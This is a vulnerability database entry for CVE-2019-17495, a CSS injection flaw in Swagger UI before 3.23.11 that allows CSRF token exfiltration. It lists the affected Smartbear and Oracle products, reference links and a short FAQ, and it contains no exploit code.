Vulnerability Description
A Cascading Style Sheets (CSS) injection vulnerability in Swagger UI before 3.23.11 allows attackers to use the Relative Path Overwrite (RPO) technique to perform CSS-based input field value exfiltration, such as exfiltration of a CSRF token value. In other words, this product intentionally allows the embedding of untrusted JSON data from remote servers, but it was not previously known that <style>@import within the JSON data was a functional attack method.
CVSS Score
CRITICAL
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Smartbear | Swagger Ui | < 3.23.11 |
| Oracle | Banking Apis | >= 18.1, <= 18.3 |
| Oracle | Banking Digital Experience | >= 18.1, <= 18.3 |
| Oracle | Banking Platform | >= 2.4.0, <= 2.10.0 |
| Oracle | Primavera Gateway | >= 16.2.0, <= 16.2.11 |
| Oracle | Utilities Framework | 4.3.0.6.0 |
Related Weaknesses (CWE)
References
- https://github.com/swagger-api/swagger-ui/releases/tag/v3.23.11Release Notes
- https://github.com/tarantula-team/CSS-injection-in-Swagger-UIExploitThird Party Advisory
- https://lists.apache.org/thread.html/r103579b01da2d0aa0f672b88f811224bbf8ef493aa
- https://lists.apache.org/thread.html/r3acb7e494cf1aab99b6784b7c5bbddfd0d4f8a484a
- https://lists.apache.org/thread.html/r84b327f7a8b6b28857b906c07a66dd98e1d341191f
- https://lists.apache.org/thread.html/r853ffeb915a400f899de78124d4e0d77a19379d2e1
- https://lists.apache.org/thread.html/ref70b940c4f69560d29d6ba792d6c82865e74de3dc
- https://www.oracle.com/security-alerts/cpuApr2021.htmlPatchThird Party Advisory
- https://www.oracle.com/security-alerts/cpujan2022.htmlPatchThird Party Advisory
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://www.oracle.com/security-alerts/cpuoct2020.htmlPatchThird Party Advisory
- https://github.com/swagger-api/swagger-ui/releases/tag/v3.23.11Release Notes
- https://github.com/tarantula-team/CSS-injection-in-Swagger-UIExploitThird Party Advisory
- https://lists.apache.org/thread.html/r103579b01da2d0aa0f672b88f811224bbf8ef493aa
- https://lists.apache.org/thread.html/r3acb7e494cf1aab99b6784b7c5bbddfd0d4f8a484a
FAQ
What is CVE-2019-17495?
CVE-2019-17495 is a vulnerability with a CVSS score of 9.8 (CRITICAL). A Cascading Style Sheets (CSS) injection vulnerability in Swagger UI before 3.23.11 allows attackers to use the Relative Path Overwrite (RPO) technique to perform CSS-based input field value exfiltrat...
How severe is CVE-2019-17495?
CVE-2019-17495 has been rated CRITICAL with a CVSS base score of 9.8/10. This is considered a critical vulnerability requiring immediate attention.
Is there a patch for CVE-2019-17495?
Check the references section above for vendor advisories and patch information. Affected products include: Smartbear Swagger Ui, Oracle Banking Apis, Oracle Banking Digital Experience, Oracle Banking Platform, Oracle Primavera Gateway.